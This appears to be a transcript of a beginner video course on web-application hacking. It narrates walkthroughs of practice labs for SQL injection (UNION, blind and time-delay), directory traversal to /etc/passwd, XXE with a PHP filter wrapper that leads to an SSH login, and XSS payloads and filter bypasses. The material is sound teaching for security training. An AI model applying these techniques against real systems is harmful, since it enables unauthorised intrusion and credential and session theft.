information and try and solve this lab and if you have gotten stuck we're going to go ahead and walk through this together now so the first thing is turn your Interceptor on we're going to go through the normal procedures here or send it to repeater Turn The Intercept off and make sure that we have our air up here which we do so this is telling us we have a SQL injection we are going to pull down the number of columns I know there's at least two because we were told that we have to log in as the administrator which means there's at least a user's name a username and passwords column so we have at least two of those and then we'll go ahead and send this and it comes back so there are two columns both of these are going to have to retrieve a string in order for us to pull down a username and password so I'll go ahead and check it anyway but I know it's going to come through and it does now this is where we're going to start practicing what we learned in the previous video so if you remember the first thing we have to do is find the table name so we can go ahead and type in our table name and this is from last time we used information schema but if you remember this time we're going to use all tables and there we go so this should give us all tables if you remember last time there was a bunch of them but we are looking for the users I'm guessing this is the one that we need history we're gonna go ahead and pull down the information well this is uh we'll grab a couple of them just in case but I think that's going to be the right one so we'll keep this one this is the one we're gonna roll with now what we'll do is we'll have to come back up here if you remember and change now that we have the table name we're going to go ahead and insert this and see if we can find the column name so we'll change this to column and we'll leave our null and it is from and this time we're going to and put in our table into our injection so we have from from all of our tables and we're looking for at this point the columns where it is equal the table is equal to the table name that we just pulled down so we have where and then we'll type in our table name and then equals our table name and we'll go ahead look this over and then we'll send it and it came through now we have to hope that we have our columns so we have a password column pull down and we have the username okay now we have to change our injection one more time so we will this time we'll be getting rid of our null value and we're going to be putting in first our username and then we're also looking for the passwords which will come from our second column and this is going to come from our table name which I actually think we delete this we'll delete that and we'll delete this and we have an error comma and we have pulled it down so this should have our usernames and our passwords in it just like the last one that we walked through here's the administrator and the password and so if you remember we have to log in to actually receive the solved lab up here so we'll go ahead paste that we'll copy and paste this and send it and we have solve the challenge and we are ready to start the blind SQL injection we are going to go ahead and open up this lab while it's loading I thought I would just tell you this is going to be the next couple of labs are going to be a little more difficult and I think that you should practice them just to get this ingrained into your mind what exactly is happening because we're going to be adding quite a few new steps but they actually let us skip what we have been practicing because in the instructions they give us that we are going to be working with a table called users and two columns usernames or the username and password so we don't have to go find the table and we don't have to find the columns but we do have to still log in as the administrator to complete this lab so you can go ahead and open up this lab start this lab exactly how we normally would by opening up one of these tabs forwarding it and then sending our request to the repeater because what you're looking for is a request with this tracking ID you need that tracking ID because that's where the SQL injection is going to be so we'll send this and you can send it a few times and what I'm looking for is this content linked I want to make sure that it does not change and sometimes you will send this on some web applications and it will change every time no matter what you do the exact same get request but for us in our case it stays the same which makes this lab much easier to solve and when you have this tracking ID you can also check it as well for the SQL injection and so you send it and you can see the content length has changed so it's 49.06 and you send it and now it has changed this tells us there is a possibility of a SQL injection so what we're looking for is what has actually changed in our response here what I like to do when I come across a different response is to copy this and take it to a text editor I think it's easier to read through and to look at and I also can search which we are going to do right here so when it comes back without any modifications we have the let's send this again we have the welcome back is on the page when we put in our single quote to try and provoke an error the welcome back is gone so you can see we have zero matches right here so with our zero matches we want to send a true statement to make sure that we can really add on to this query so we go or one equals one and then comment this out that comes back as true so we know that we can give some kind of requests and see what comes back true what is actually true and is on the database we'll come back with this welcome back which is what we're going to have to pay attention to and so because we've already been told what the table name is and the column names we can go ahead and start to look for information from this table so we'll type in our usual Union select and this is where it changes because we're going to now add a character into our query so we're going Union select from and then we're going to go to our users table where the username oops username is equal to and then remember we were told we need to log in as administrator so the username we're looking for and we are going to send this and see if it comes back as true and it does so we have this and now what we can do is we can actually add on to it and we can look for the length of the password and so you can come in here and you can look to see how long the password is and you can pull down the length of the password and you can come in here and you can go plus and plus length and then we add in the password and then you would add is it greater than and then you can start right here and you can start sending to see is it greater than 1 is it greater than 2 is it greater than 3 and you can send this to the burp repeater and just continue seeing is it greater than and looking through this what I am going to do is I'm actually going to skip this process for the sake of time because we're going to have to go into a burp Intruder and start looking for the actual password so what we're going to do is we're going to send this query over to the intruder and see what we can pull back so I'm going to go ahead and take this query here and what we're going to do is we're going to take this and we're going to add into it the characters that we're looking for and so you would add in that you're looking for the first character and only one character inside the query and then you're going to start with the character a now this at this point I'm sure this is the first time you've ever seen anything like this it is it looks very strange and it is going to feel really strange doing things like this it's new and it's kind of confusing so we'll send this not to repeater to Intruder and so we have this new string that we're sending so we have our normal Union select and then we have a string from users where the username equals administrator so we're looking on the table name users under the column user name for the administrator's password and we are looking for the actual password at this point and this actually I just noticed we're not looking for the length of the password we're going to be looking for the substring so we'll come over to Intruder we'll look at our positions because we've already sent sent this over here we'll clear where it wants us to start querying and we are looking for the substring in the password and so we will go ahead and set this up what we do at this point is as we set up our payload you will add the whatever those symbols are to tell it this is where we want to shoot through or we're going to use the cluster bomb so this is where we're going to be going through and sorting to make sure we have the right characters and then we'll add right here because if you remember this selects the first character and then it's going to go through the first character every for all the characters that we give it but then we want it to go through the second character as well and the third and the fourth and the fifth until we reach the end and we have the password I don't have the professional version of burp on this system and so this is actually going to go really slow and once it starts I'm going to go ahead and pause the video so you don't have to wait for it to pull down the password because it will actually take a while without the professional version of burp and so what we're going to do now is we're going to set up our payloads and so if you remember payload one is going to go to this position and payload 2 is going to go to this position so the first payload we're going through numbers so we will find numbers and we're going to go from one and this is when I guess it would have been helpful I'm just going to go really far this is when it would have been helpful to see how many characters were in the password so you would have known how far you needed to go and then we're going to go by a step of one so it's going to go up one character once it goes through all 30 characters and then position two we are going to be going through the alphabet see if it has the alphabets in here for us I believe it does manually add these in it would be a lot easier to go through these without having to do this but I will edit this out all right I believe we have all of the characters added in what we can do is we can go ahead and start the attack and we can say okay and now it is going to go through and start working through all of those characters so position is position one and a is position two and a is position three and a and it's going to go through and check every character for each position until one returns true okay I have gone ahead and cut the video uh in the middle of where we were after starting the attack and you can see that it's been running and we've pulled down some of the characters that we've needed one of the things that might be helpful if you copied exactly what I had typed in into the payload or into the query right here I actually had a uh error and I had to go through and change that and fix it and then that ran for a little while and then also my computer fell asleep while running this and it closed out my query and so I had to restart it and so this has been running for what feels like forever and so I'm going to go ahead and we're going to stop it here and I'm going to show you a little more manual way and it's also a lot faster because if you can see it's moving one it's sending one query each time to the server and it's very slow anywhere from 10 to 15 seconds and it's because we've sent so many and this is one of the things burp does in order to get you to buy burp professional so that it'll send them really fast so they've throttled this down but I'm going to show you a way that you can kind of get around this and send your queries a lot faster before we start that I kind of wanted to show you our positions just in case it wasn't clear remember in our query we are selecting from the users the table users where the username is just the column and we're looking for the name of administrator inside the password column and so we're sending what this is the first character in The query so this would be position number one and then it'll change it'll go position number two and then position number three and it will send a all the way through however many we set those positions one two three four five six to see if an a comes back as true in any of those cases and if it comes back to true we'll see something like this you can see the length has changed and the welcome back is present in the response and then once it goes to all of position one for all of the alphabet it will go to B and then it will start over and it will continue and it'll go through like that this is a very automated way we don't have to really do anything we just set it up and let it run but if you don't have burp professional this can take a very long time and one thing before we go ahead and I show you how to organize this to find the password is that in order to get this welcome back to show up what you do is you can check in your response and you can have your welcome down here and if you can see these it matches the welcome has come back which means it's true and we have a match for these down here it is not true and there is no match and so we can sort out the true characters that exist and in which position they exist so there's a g in position two there's a g in position 15 we have a K in position eight and so on and so we can know this is where there's characters in this this is how it's true but in order to get this welcome up here you have to go into your options you will come down so it'll start you up here you'll scroll down to grep match it will clear what's in here and you will add welcome you'll get a little pop-up you'll just click ok and then it will bring you back to your results and it will look like this and what you do is you just click this and you click it again until we have the arrow facing down and it will have all of the characters there for you as it runs now the way I like to sort out the password is to have a text file open which is right here we have our text file we'll delete this and we'll delete this and we'll paste this in so what we have here we'll also delete these because these are just our query numbers on how many um get requests were sent to the server and I think the lesson numbers we have the easier this will be to understand so this if you remember let's open this back up and have our text file this is the position uh from payload number one and this is the character that has come back in payload number two so what you would do so let's say this is what we've brought back and the and the query is finished even though we know it's still running and it's going to take five more hours for it to finish running so what we'd do is we'd have our password equals and you'd come here and you'd go okay position number one is I and then we'd look for two two is O position number three is a k and then position number four is an i and position number five L and position six is a g and then you'd go along and you would just continue doing this all the way through so we get six and then we go seven and then eight is a c nine is in and by the time you've gone through all of this this is your password and so we were told that the username is administrator and the password is what we're pulling down right here and we'd come over here we'd go to our lab and this is where we would come in we'd click login you would use administrator and then this password that we have just pulled down so if you want to let your Intruder run for ever because it is really slow especially once you get past about position um after you get past request number 30 to 35 it really slows down so I'm going to go ahead and close this out okay we are going to look at the blind SQL injection with time delays so what you'll do is if you find what you believe to be a SQL injection you will inject a time delay and they're pretty simple but I also want to look at the cheat sheet because they're going to be different and we're only going to be looking at this one right here the blind SQL injection with time delays is really simple simple to the one with conditional responses which we just looked at the only difference is you would be running a case and then a statement which if you're a programmer it's like if then and uh you're you're going to be saying if this is true then sleep and rather than if this is true so with the cheat sheet these are all going to be different so you'll have to run this to get your program to sleep you'll for your delay with Microsoft it's going to be like your syntax is going to look like this for postgres ql is going to look like this and MySQL is going to look like this and so each one is going to be a little different and you might have to just try each one and see what comes back for you okay so this is we're going to have to to solve the lab we need it to sleep for 10 seconds which is kind of a long wait but 10 seconds feels like forever when you're waiting for a response and get to a get request so we will go ahead and turn the Interceptor on open this up I think I clicked in the wrong spot oh there's a tracking ID we have one right there and this will look let's see if it's it says it's blind so it's not going to have anything for us I'm actually going to go ahead and go to an item so that I know I'm in the right spot you guys don't have to watch me fumble around like you are right now so we'll go ahead send that to repeater and the equal objection that we're looking for with the time delay is the postgres postgresql right here so what we'll do is we'll use this syntax right here the PG sleep 10 and we're going to have to concatenate it to our query so it's just two types which is just above your inter Ricky key or your return key if you're on a Mac and then you just type in the syntax exactly like you just saw and then we don't forget to comment out the rest and that should take 10 seconds for our response to come back and once that response comes back we should have a solved up here and so the time delays are really simple uh they're really easy to run and this is how you do it I'm not sure why they didn't come back as solved maybe we have to go ahead and forward this there it is there's the salt so they're really simple to run they're really easy proof of concept you can change this to five seconds if you're impatient like I am and wait just five seconds instead of 10 but you have to do 10 here to solve the lab okay we are ready to start directory traversal we have talked about this just a little bit earlier when we talked about navigating through files and we talked about going through files such as this so we would CD into the desktop and it changes us we change into that directory and so we're able to go between directories and go into different files and the way we go backward if you remember if I wanted to go back to my home I would just go back one directory and that takes me back a good way to practice it practice this and maybe you've done this earlier is to open up your home folder and just up here in your little search bar you can practice going backwards or you can practice going forwards and so we'll just be going forwards like this and then we can go forward again and we can go into our desktop and then if we wanted to go back we would just do two dots and a slash and so in directory traversal we will be going through files only on in our browser so we would be going backward through here and we talked about this a little bit in the previous lessons and so we're going to go ahead and open up our portsmigger in our labs and you can scroll down until you find the directory traversal and then we're going to walk through a few of these manually and then I'm going to show you a tool that does this for you and I will pull up a directory traversal that is found on hacker one just so you can look at it and you can see just that these are not something that's lost out there and somebody's found them all actually recently I would say within the last two years someone found a bunch of directory traversals they were able to to pull down files that they should have never had access to on the Department of Defense and so if you would think of any organization that's going to have good security you would think it would be the dod and these were found recently within the last two years directory traversals on the dod and so it's out there and they happen I've actually found a few of them and uh I will go through them manually and then I'll show you a easy way to fuzz through with a tool that will actually pull down and tell you where a website is or a web application is vulnerable and exactly which exploit they used to prove it's vulnerable so we'll do that after we go through some of these manually okay we are ready to go ahead and open up our first lab and you're going to be able to see just how easy these are to find manually as they I think they're really simple and and anyone can go and try these with really knowing very little about how the web application or locating files Works in general you can pretty pretty much find these straight off your very first day so we'll go ahead and access the lab and turn this on turn on our lab and while that's opening there's a few ways a few different ways to look for these probably the most common is going to be up here in your address bar you'll come up here and this is where you'll search for them and I'll just go ahead and show you what you would do is you'd pull this open and you'd hit your slash and you go dot dot slash dot dot slash and then you would hit enter and see if it can take you back any files but it is not going to work for us in this bar we're actually going to have to use burp for this and so we'll go ahead and turn it on turn our intercept on and we'll view details and so what I'm going to go ahead and do is send a few of these request to repeater because I'm not actually sure where exactly we're going to find the traversal so we'll go ahead and send that to repeater as well and I think that's it so we'll go ahead and open this and so if you remember how to go backward in our files we'll actually start with the first one we sent we'll go ahead and delete this and so we're looking for the product ID and you would go dot dot slash dot dot slash and then what we're looking for if you remember in the lab description is the Etsy password and so we just type in ETC slash password and then you can send it and it says we get a bad request and so we'll go a couple more and see what happens okay so we're getting a bad request what we'll do is we'll go over to our other git uh get request and we'll go ahead and do the same thing I like to go ahead and start out just like this and then you add to the path reversal as we go and so I just go just like this and see how far we have to go before we can actually find the files in this case before we solve the lab okay so there it solved it so it goes back to the root folder and then it goes forward into this file and then it'll go forward into the password file and it pulls down for us information that we should not be able to have access to and so for us this should solve the lab for us so each one of these just goes back one file and it goes back until it hits the root folder and then it'll go forward into this directory into this file and that will give us information that we should not otherwise have access to okay we are ready to go ahead and solve our second lab on path traversal so you can go ahead I think with what you have learned so far in the very first slab you should be able to solve the second lab on the directory traversal so if you want to go ahead and give it a try you can open up the lab which I've already done and you will be looking for the same file we were looking for last time the Etsy password file and that will solve the lab for you and so you can go ahead and pause the video now and see if you can solve this challenge okay how did that go hopefully you were able to solve it without in trouble if not we're going to go ahead and walk through it now we'll go ahead and turn on our interceptor and we will click one of the view details just to make sure we can pull down the same get request we had last time which was not the product ID it was the image file the image file name so go ahead and send that to repeater and while we're over here we're going to start out just the same way we did last time we're going to come in here and start with our Etsy password and then as necessary if we needed need to we'll go ahead and add in the dot dot slashes but we always start at the beginning and go forward if or go backward if necessary so we'll go ahead and send this and it came back on the first try so hopefully you were able to solve that challenge because they're going to get a little more challenging to do manually but not all that difficult for us okay we are ready for the third challenge that we are going to be looking at for the path traversal and this one we're actually told what's happened so go ahead and open up this lab and we'll see our instructions here and we're told that the sequence is stripped away non-recursively and so what we will have to do is modify the attack just a little bit and pretty regularly especially with cross-site scripting you will see developers that know of a way or maybe a few ways that an attack can be performed and so they'll just go ahead and strip out just specific elements or sequences within a within an attack or a payload so that they won't go through but there's almost always another way to pull this off and so actually in this lesson and the next one we're going to be able to observe just how you change payloads and really in bug bounty hunting what you're going to be doing is a lot of trial and error until something works and so we'll go ahead open up this lab and once you're in here you will click view details after you've turned on your intercept we'll go ahead and turn that on and my son would think this is the coolest toy ever and so we'll go ahead and view the details we'll get our get request that we need right here we'll send it to repeater we'll Turn The Intercept off and once we're in here we'll go ahead and we can start out with the Etsy password and then we'll send this and it comes back with a bad request and so you can go ahead and try going back and it comes back with a bad request and I actually know what is going on because we're told that the traversal sequence is stripped away so what we'll have to do is try something different and so what you can actually do is go four dots with two slashes and then this is going to be a different process in pulling down the Etsy password file so we'll send this and then we will one two three four continue going and we are able to find the file we need now when it comes to remembering all of these different ways that you can try and find a directory traversal it is not necessary to try and remember these I'm going to show you a tool that actually does all of this for you with hundreds and hundreds of different ways to pull down an Etsy password file and so I'm just showing you manually how this works so that you know what's going on and you know how to find these just in case you're not allowed to run a scanning tool or anything like that on a specific web application but you do not need to try and remember all of these different ways to pull down the Etsy password file because you will have sources available that can do it for you or remind you exactly how to pull off these attacks okay we are going to be working through our final path reversal before we look at how to do this with the automated tool and so you can go ahead and open up this lab and in here we can read our instructions and exactly how to pull this off and so we're told that this has URL decode in it and so this is actually um very similar to a exploit that was pulled off and I came across this not too long ago when I was looking through Pat reversals and how they were pulled off on the hactivity and so we have this was done June 9th 2018 so quite a while ago a couple years but this is going to be pretty much the exact same exploit we're going to be doing in this lab so just to show you that these Labs aren't just theoretical but they actually do help you perform these exploits and so you can see here this is the URL encoding and so a simple way to look at URL encoding is you can come over here to the decoder you can type in some gibberish and then you can encode it as URL and you will see the URL encoding pulled down here and so what we are going to be doing is doing something very similar to what this guy has done here and you can actually see he actually pastes it pulls down the file that he should not have access to so what we are going to do is come in here you open up the lab click access the lab same as we've been doing the last few lessons we'll open up burp turn on the intercept and we will view details of one of the files we will look for the get requests with the image file name send it to repeater and now what we're going to do is very similar to what we just saw so we'll start out just like normal you can go ahead and send this and then we are going to type in the URL uh encoded version because it's going to decode it for us which is percent two five two f and that should pull it down for us we'll go ahead and delete that because it's encoded in there and so we can send that I'm going to do rather than type this is I'm going to go ahead and copy it and then paste it and then send it and then paste it and then send and there we found the file and so you can actually really easily see how this is very practical here we're practicing it here someone actually pulled it off on a live website and so if we come in here and we turn our proxy off we should solve the lab and so in the next lesson you are going to be required to open up juice shop because this is the URL we're going to be using to pull off the attack on our automated tool so you can go ahead and open up g-shop and get it running okay we are going to be looking at the automated way to find directory traversal exploits so you can go ahead and open up a terminal and have a Juice Shop open and running and just to make sure you have the tool installed you can come down to your terminal and you can type in sudo I have to get installed should look exactly like this and then you will hit enter it will require your password you can go ahead and type that in and it will run and it might ask you are you sure you want to install and you can press Y and then hit enter or return if you're on a Mac and it will install and so the way to run this tool is very very simple you would just type in dot dot pone and then we will give it the parameters that we want it to follow so we'll just type in dot dot pone and then we will go Dash M and this is actually already ran it just to make sure it would run on our local server and so this is what you will type in you will type in and then you'll flag M HTTP and then you'll flag H and it's our local host and so I actually just came up here and copied and pasted the page I was on and when you hit run it will run for us oh it did not run for us because we have to run it as sudo as our super user and now it is running and it'll ask us press enter to start the testing and then we'll go ahead and hit enter and now you can see look it is running all of those for us with the dot dot slash dot dot slash and then it encodes it and it just runs through and it tells us even where it's a vulnerable now this web application is vulnerable I think is vulnerable to all of them they did not do a good job when building the web application for making it secure to this attack and it will run and there are hundreds of different ways to send there's the one we just saw with the percent 252f and it is runs it for you and it'll tell you for us it would have been right here we would have had three paths to go back before it goes forward into the Etsy password and so it would have found it right here it would have flagged it as vulnerable so now you can see just how easy it is to run this with this tool and you can go ahead and hit command C to close out of it so that it'll stop running and it might have actually went ahead and and solved a challenge for you if it didn't you can go ahead and type in dot dot slash dot slash dot dot slash relieve any of these because it says it's vulnerable to them and then type in ETC slash password and it should pull down I think I already solved the challenge it should pull down that we have accessed a file that you should not have had access to and so that will solve that challenge for you it's pretty simple running this tool is really easy and it takes a whole lot of the manual testing that we just did out of account for us and it will run hundreds of different ways to find a path a traversal okay we're going to start by looking at the XML injection at this point we're going to start a really easy XML injection this is one that you're going to see that's probably the most common and then from here we're going to look at some more Uncommon XML injection methods but they're going to be a lot more severe and so this first one is really simple you can go ahead and open up this lab on portswiger right here and I want to walk you through we'll go ahead and click access lab I want to walk you through what is happening so when we look at this XML injection I want to focus just on these two lines when you see this xxe right here we can change this to be anything we want and we see it down here it is the same thing this is the xxe being called and telling the XML file that we wanted to do something right here so we're going to tell the system to open up the Etsy pass WD file and so I will show you what this looks like when you come up here and you click view detail we will need to turn on burp and forward this to repeater and we can now turn this off and we're going to need this right here so we can copy and we'll paste it in right here at the top and now we're going to delete this first part right here and we're going to chain we can leave our I guess we'll leave our doctype as Foo and we're going to change this right here to Etsy and this right here to pass WD and then down here where it says the product ID what we're going to do is we want to call this right here to tell the system we want it to do something so if you remember what this looked like over here we have the and xxc with the colon we need burp and where that product ID was we can paste this in and now we'll send it and see if we have any errors and we do not and it provides for us the Etsy pass WD file this is a pretty big vulnerability this is something you shouldn't be able to look at this is a this is actually this is something you shouldn't be able to look at and it will give us users that are on the system so from here we're going to move on to try hack me and we have a Juice Shop which is a really great place to practice a lot of web application vulnerabilities and we will hop over here and pop open a machine and I'll show you a file upload XML injection we'll come over to OAS Juice Shop you will need to click on login and create an account so I'm going to create an account and then we'll be back at the home page and I'll show you where to start from there okay so we are all logged in and we are now at the front page we'll come up here to the three lines we're going to say we want to file a complaint and we'll just say a bunch of gibberish and now we're going to need to upload a file so we will create our XML file file by coming over here and G edit and this is what we'll just name our files so the way we know what it is I'm going to make this on my desktop so that it's easy to find and now we need our code to inject with so we'll copy this we can move it over here to our file and then we'll just change this to Etsy pass WD and save it close it and come back over here to Juice Shop and click browse we go to our desktop we want all files xxe open we need burp to intercept this so we'll come back to our proxy intercept and submit send this to repeater I actually don't remember which one this is so we're going to send a couple of them oh we'll set this and we'll just turn repeater off and hope we got it so it says we've solved several of the challenges we'll come to repeater we'll go back here to the first one we'll send it and right here is the pass WD file it doesn't come back and quite as nice a format as our original one that we had done on portswicker here but we have the XML the XML injection work and we have the pass WD file and here's the root user so this is a file upload XML injection and now we're going to cover a XML injection that's going to lead us to remote code execution and you can actually see right here they tell us remote code execution if we are lucky and the PHP accept module is loaded we can get remote code execution and we're going to go ahead and try this but this is on hack the box and if you don't have a subscription to hack a box that's okay this would be something I have never seen outside of hack the box but it's something to be aware of so we'll go ahead and I'll open up hack the Box launch the box and get all set up and then I'll walk you through a and XML injection with hack the Box all right I have popped open here for us the hack the Box machine this is the landing page and if you run a dirtbuster or fuff you will find this db.php and then we have the portal .php and we click this and we are brought to this page now if we go to test it grab our Interceptor and we just put something in here and we send it we'll send this to repeater turn this off send and we have this value right here data and this is what we get back we have this data parameter right here we can copy it come to our decoder and we can decode as a URL decode as base64 and we see we have this XML we get an XML return that has been basically for encoded and then URL encoded and so what we can do with this is try and add to it or adjust it and see if we can pull off an xxe attack by just reversing this we can add in our own payload and then we can encode it as base64 then URL encode it and put it back into the repeater tab right here so what we'll do is come over and we'll just try to pull down the we'll try to pull down the Etsy pass WD file first okay one other way to look at this that is a lot easier rather than just coming into the repeater coming into the decoder and decoding this as URL and then basic C4 to get to the XML file is we can go to our repeater and remember we have this data here we can come over to our inspector and then we can click this little arrow right here and it will automatically decode this for us and we will land right here and we can actually do our changes right here apply changes and resend this and get our input brought our response brought back to us so what we will do is come over we'll go to olasp and we will grab the XML right here the xxe we'll open this up to grab our payload this is not the one we were in earlier but that is okay so what we will grab is the doctype and the file system and we'll stop right here we can copy this we'll put this on a new line right here we'll actually try to see if this will let us put this all on one line so that it looks better for us now that we have this on well not one line but it's a little better here we go there we go now it's on one line so what we're going to do is similar to what we've been doing before is we can just leave this however we want we're actually going to delete this we don't really need that and it looks a little better for us this goes on a different line guess we'll leave it okay so here we go what we can do at this point is Type in Etsy slash pass WD and then down here we need to call the xxe so we can go our and symbol xxe and our semicolon and apply changes and if we send this response you can see right here we have the pass WD file brought down for us and so one of the things we always should look at especially when we are on a hack the Box some kind of CTF or even a pen test or a bug Bounty program you really wouldn't do this but you would look for the users because you may be able to attack some of them so we have the development user here's the user ID we have root obviously up here and what you can do is just look for the ones that have been bash and those are the ones that will have a shell available on them so we have development and root and a quick look I'm not really seeing any others and now what we can do is try to pull down that db.php file but in order to do that you will have to use a PHP wrapper and those are something I would suggest learning because you will see them every now and then whenever you see a PHP system running a lot of times you can thank PHP wrapper and see if you can pull down the information that you should not be able to and there's a lot of different places you can use those PHP wrappers but one of those places is going to be right here so instead of pulling down a file what we're going to do is we're going to type in here PHP and we can delete all of this and type in filter slash convert dot base 64 Dash in code slash resource equals and instead of the Etsy pass WD file what we're going to be looking for is the db.php and you can find this typically if you're familiar with doing ctfs or any kind of pen testing you will know that the you can find the files inside on you can find the files for a web application inside of our slash dub dub dub slash HTML db.php and this is pretty standard for where you're going to find files on a Linux system and we can apply changes we can copy this we can go to the decoder paste this in and as we decode it with base64 it tells us that we have this in our response so this would be what was brought brought back with our PHP filter and we have a username right here we have the database name we have a password right here and we should be able to ssh in as the development user using this password right here because we know possible it's really common for people to reuse their password and this will actually lead to remote code execution so if we come over here and we say SS H and then we say what was make sure we had that user right I think it was development at 10 10 11 100 we might have to grab that user again we'll say yes and come over to the decoder grab the password and paste that in and it worked so this is how you can get remote code execution on the box using on a server using xxe and so with that this one was really complex but XML injection is something you should look into and try to learn I would suggest going back to port swiger and maybe practicing a few of their xxe challenges as well as Juice Shop and just play around with it until you feel like you are comfortable and you understand what is going on so there are three different ways that you can use xxe in the cyber security testing World okay one of the most common vulnerabilities is going to be cross-site scripting or it's also known as xss and this vulnerability is common but it's also going to be pretty hard to exploit without knowing some form of HTML and JavaScript so there are basic payloads that you can go in and you can just test a bunch of them and I'm going to show you a list that I found it's got over 6500 different ways to try and exploit this but most of the time you're going to have to inspect the page and modify the content but we'll get to that in just a little bit I'm going to show you just a couple of cross-sized scripting examples here and then I kind of want to show you the code of what's going on I think you'll be able to understand it even if you know zero programming so with that we'll go ahead and I'll show you an example of what cross-site scripting is and then I'll explain why it's so dangerous and so this is going to be the most basic simple form of cross-site scripting and so all we want to do is have an alert pop up and if you can pop up in an alert on a bug Bounty program you will be able to submit that for a vulnerability and there you'll see them a lot of a lot of places a lot of people like to look for them I don't really look for them all that often because I think most people look for these and if it's not stored across site scripting then you're not really going to get paid for the amount of time that you put in you'll get paid but just not for not enough for the amount of time it's going to take to find them so we're going to do this with an image and image tags will go image source equals and then we leave it blank and when this is blank it's going to make an error on the page and so on error we want to alert which is going to give us the ability to pull off the cross-site scripting and we're just going to alert one and then we will close the tag and I have made a mistake somewhere let's go ahead and delete this equal sign there it is so we have the alert pop up and it says localhost one now what you can do with a cross-site scripting and why it's so dangerous is not because you can just pop things up on somebody's screen but what you're able to do is you could make this look really fancy and you could say log into a Wi-Fi or log into this page or your you were accidentally logged out and people can type in their username and their password and then all of a sudden you have their credentials you can put alert document.cookie right here and then all of a sudden you can steal their session and so there's quite a few different ways that you can use this to get malicious with it and so that's why it's so dangerous but it's also really common it's going to be in the top 10 vulnerabilities that you're going to find on pretty much any list and so right here is a different version so right here it's just plain as can be you can type whatever you want and nothing's going to get blacklisted so right here I have made a little it's really short it only has the image tag but you can type your script the image has been blacklisted so what I mean by that is if you watch what happens every I finished typing image and it automatically deletes it this will happen on programs that you're going to test that they'll have characters that are blacklisted I have come across that I come across it regularly I have come across across blacklisted characters when I was trying to do a SQL injection so you'll come across blacklisted characters what you'll do is you can go out and you can find encoders and you can encode your payloads in order to fit your specific needs and in this case it's pretty simple all you have to do is go I and make a capital M and A G and it doesn't get deleted or you could go capital i m g and this is a way that you'll find expression and capture the flags to bypass blacklisted characters or words is you just change it a little bit or you can encode it and you can bypass the filter and so we could do the exact same thing that we had done before so we'll go on error um equal alert and then we'll just do alert one and then we'll close it off and there's the alert so all we really had to do was just change the image tag because the image had been blacklisted but we were allowed to pull up a different version of the image tag and so what this looks like here we have Band characters so you can have ban banned characters such as these people will ban these characters so that you can't inject your code into it but we will I will show you uh so in this case I actually ban this character the backslash so no matter how many times I push it it's not going to come in but you can still um ban this you will find the backslash band because if you can't close a tag then it's going to be really hard to pull off a cross-site scripting not impossible but you can still do it and so what this looks like is I am just replacing the image with an empty string and over here we have the Band characters and you can see right here you're not allowed to use those and I replace them with an empty string and so this is what a blacklist would look like you just have a bunch of characters listed that are blacklisted and you're not allowed to type them in so when you have a band blacks backslash which you're probably only going to see and capture the flags uh some something like this but what you can do is you can actually make a button tag like this if I can get that right there we go and then you can just type something in here and then what you can do is you can type in on click equal and then you do the same thing you put your alert and we'll put our one and we don't have to have a closing tag we don't have to close that so we click it and there's the alert and uh you will see this in one of our practice uh when we practice the cross-eyed scriptings so those are uh just a few ways you can pull off the cross-site scripting I want to show you um a page that has a ton of cross-site scripting payloads and here it is you can actually just Google cross site scripting payloads which we'll go ahead and I'll just do it right now walk you through it we'll just type in payloads and just click the first one and here's going to be a list so you can have you can get an idea of how many are out there and different ways you can do a cross-site scripting and so you this is why I'm telling you there's a lot of different ways to do these we'll actually see one similar to this in just a few lessons because you have to we're going to have to close off a tag and then we're going to have a character blocked and then we'll actually be able to insert the payload so there's a ton of different ways to pull these off it it's going to require some knowledge of HTML and JavaScript or you can if you're on a capture the flag you can just go to burp Intruder and you can just send this entire list until you are able to receive the solved challenge but with that this is a basic introduction into cross-site scripting and we'll get a little more Hands-On and I'll have you guys start practicing writing your own payloads in the coming lessons Okay for this challenge I want you to come to the hacker one or the hacker 101 CTF this is uh hacker one's practice site for us to practice what we've learned you can come in here to the easy with two flags and click go if you would like the challenge we have already saw the xss in this challenge I showed it to you in the last lesson so if you want to go ahead and look for it on your own you can go ahead and do that I think you have the knowledge to solve this challenge all on your own without any help but I will do a walk through here in just a second so if you would like the challenge you can go ahead and see if you can find the cross-site scripting and you can do that now okay once we're in here you can go through and one of the first things if you remember from the Recon lesson is to click through and just open up everything in the page and just see what you can find and what you can do I actually just thought of another way to try and solve this challenge that I might try and see if it works and then we'll you can come back and you can go back to the home page you can create a new page and you can just click through and see what you can find but in the markdown they actually give us a clue as to how to solve this challenge you have this random button here it doesn't do anything but if you edit this page we have the tag for a button so if you were unable to find this you can go ahead and try and solve the challenge now because if you remember if we have a button we can come in here and we can go on click and then we can put in our alert and then we can put in one and so we have our on click here and it's closed off and we should be able to save this and on our click we are given the alert I just thought of uh I bet we could copy this just there's another way you could have solved this if you didn't see this button here and uh you didn't have this clue but you came into the testing and edited and you saw this you might have thought to go ahead and just insert your own button and you could have pulled off the same thing just on a different page and we'll go ahead and change this to just click just so you can see it's a different button on a different page and we could have done the same thing so that is another way that we're able to pull this off and we're going to see a couple of uh a couple of more examples and the reason for this is the cross-site scripting is a rabbit hole that you can go down indefinitely there are thousands and thousands of different ways to pull this off and so I just want to show you the basic introduction into cross-site scripting because without knowing HTML and JavaScript it's going to be kind of challenging to pull these off and since this is a beginner course I'm not really expecting any software developers to be in here wondering how to do a cross-site scripting because if you're a developer you're going to already know because you will have had to write code to defend against it okay we are going to come back to portswiger and we're just going to do a few of these just so you get an idea of how cross-site scripting works and how people can attack it and just a little more understanding of seeing these um in context of how they relate to pulling off these vulnerabilities especially to beginners as you can just copy and paste some of these into search engines and search bars and you will see them on hacker one and the hacktivity and just so you understand what's going on so we'll go ahead and open up this first lab here and we will be told what we are supposed to do so we're supposed to call the alert function in order to solve the lab and this one is going to be one of the most basic cross-site scriptings that we're going to see and one of the common ways to check to see if a website or web application has any defense against cross-site scripting in a search bar like this what you can do is you can come in in here and this is basic JavaScript so we just type in script and then we type alert one and then we close the script tags this is just a basic JavaScript command here I can type and so if this has no um sanitization then this should work and you can try these In Search bars you can try them and post this script to any kind of social media outlet for the web application and see if it pulls back any across site scripting so we'll go ahead and search this and it says we have timed out because I opened the lab before I started this video so we'll go ahead and reopen the lab and let that load and we'll go ahead and once this is loaded I will actually just paste that in go ahead and paste that in and we'll search it and it pulls back the alert we were able to alert one and it says we have solved this challenge now in the next challenge we are going to go over the Dom cross-site scripting which I actually think is down here because this is one that we have seen with the inner HTML this one right here so if you would like to go ahead and open this up and give it a try and see if you can get this to pull the alert we have looked at this payload before 